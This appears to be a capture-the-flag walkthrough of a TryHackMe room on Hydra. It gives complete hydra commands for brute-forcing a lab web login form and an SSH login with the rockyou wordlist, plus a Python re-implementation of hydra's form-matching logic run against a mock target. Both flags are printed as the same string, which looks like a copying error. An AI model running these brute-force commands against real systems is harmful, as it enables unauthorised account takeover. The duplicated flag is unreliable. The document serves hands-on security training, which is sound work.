In this walkthrough, we will go through the Hydra room from TryHackMe. The room teaches what Hydra, a fast network logon cracker, is and how to use it to brute-force a website's login and obtain valid credentials. On that note, let's get started.
Task 1 – Hydra Introduction
Question 1 – Read the above and have Hydra at the ready.
Done
Task 2 – Using Hydra
Question 1 – Use Hydra to bruteforce molly’s web password. What is flag 1?
- We start with an nmap scan to discover the open ports and running services. Two ports are open: 22 (SSH) and 80 (HTTP).
- On port 80 we find a login page. We will use hydra to brute-force its password.
- Next, we use Burp Suite to capture the login POST request. Hydra's http-post-form module needs three things from it: the path the form posts to, the exact parameter names of the username and password fields, and a string that appears in the response only when the login fails.
- Use the following command to brute-force the HTTP login password with hydra. -l fixes the username, -P supplies the wordlist (lowercase -p would mean a single password), the module argument is path:form:failure-string, and -V prints every attempt.
#Use command to bruteforce the login page.
hydra -l molly -P ~/Desktop/rockyou.txt 10.10.135.55 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
- Hydra reports the password sunshine. Log in to the application with username molly and password sunshine and claim flag 1.
THM{2673a7dd116de68e85c48ec0b1f2612e}
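To make the module argument concrete, here is an added example, not part of the room or the hydra project, that re-implements in Python how hydra reads the path:form:failure-string argument and decides whether a guess succeeded. The target is a constructed in-memory stand-in for the room's login page (accepting molly:sunshine), and the four-word list stands in for rockyou.txt; both are assumptions, not the room's data. It also shows the failure mode a practitioner hits most often: a mistyped failure string makes every guess look correct.

```python
# Added example (not from the TryHackMe room or the hydra project): a small
# re-implementation of how hydra's http-post-form module interprets its
# "path:form:condition" argument, run against a constructed in-memory target
# instead of a live server. The target, wordlist and success page are assumed.
from urllib.parse import parse_qs

SPEC = "/login:username=^USER^&password=^PASS^:Your username or password is incorrect."
# Constructed wordlist standing in for rockyou.txt
WORDLIST = ["123456", "password", "sunshine", "butterfly"]


def parse_module(spec):
    """Split hydra's module string into path, form template, match mode, needle.

    The third field is a failure string by default; an explicit 'F=' prefix
    means the same, while 'S=' turns it into a success string instead.
    """
    path, form, cond = spec.split(":", 2)
    if cond.startswith("S="):
        return path, form, "success", cond[2:]
    if cond.startswith("F="):
        return path, form, "failure", cond[2:]
    return path, form, "failure", cond


def build_body(form, user, password):
    """Substitute ^USER^/^PASS^ exactly as hydra does (no URL-encoding, so
    candidates containing '&' or '=' would need encoding in a real run)."""
    return form.replace("^USER^", user).replace("^PASS^", password)


def login_succeeded(mode, needle, response):
    """A guess counts as a hit when the failure string is absent (F=) or the
    success string is present (S=)."""
    if mode == "failure":
        return needle not in response
    return needle in response


def fake_target(path, body):
    """Constructed stand-in for the room's login page: accepts only
    molly:sunshine and otherwise returns the room's error message."""
    params = parse_qs(body)
    if (path == "/login"
            and params.get("username") == ["molly"]
            and params.get("password") == ["sunshine"]):
        return "<h1>Welcome back, molly!</h1>"
    return "<p>Your username or password is incorrect.</p>"


def brute_force(spec, user, wordlist, target):
    """Try every candidate; return the first one the condition accepts."""
    path, form, mode, needle = parse_module(spec)
    for candidate in wordlist:
        response = target(path, build_body(form, user, candidate))
        if login_succeeded(mode, needle, response):
            return candidate
    return None


if __name__ == "__main__":
    print("correct failure string ->", brute_force(SPEC, "molly", WORDLIST, fake_target))
    # A failure string that never appears in the response makes every guess
    # look like a success: hydra would report the first word in the list.
    bad_spec = SPEC.replace("incorrect", "wrong")
    print("wrong failure string   ->", brute_force(bad_spec, "molly", WORDLIST, fake_target))
```

The second run shows why the failure string must be copied verbatim from the real response: if it never matches, hydra reports the first password in the list as valid. When the error text varies between requests, use an S= success string (for example a word that only the logged-in page contains) instead of a failure string.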
Question 2 – Use Hydra to bruteforce molly’s SSH password. What is flag 2?
- Use the following command to brute-force molly's SSH password. The ssh:// URI form selects the SSH module. SSH servers usually limit concurrent connections, so if hydra reports connection errors, lower the parallelism with -t 4.
#Use the command to bruteforce the SSH login.
hydra -l molly -P ~/Downloads/rockyou.txt ssh://10.10.135.55
- Hydra reports the password butterfly. Log in to the SSH server with username molly and password butterfly and claim flag 2.
THM{2673a7dd116de68e85c48ec0b1f2612e}
So that was the "Hydra" room for you. We learned what hydra is and how it is used. First we used it to brute-force a web application login page and logged in with the recovered credentials to get our first flag. Then we used it again to brute-force the SSH password and claimed the second flag. In your CTF and pentesting journey you will use hydra to brute-force passwords for common services, so it is a tool that belongs in your arsenal. Hope you found this article handy. On that note, I will take your leave, but remember to "Keep Hacking".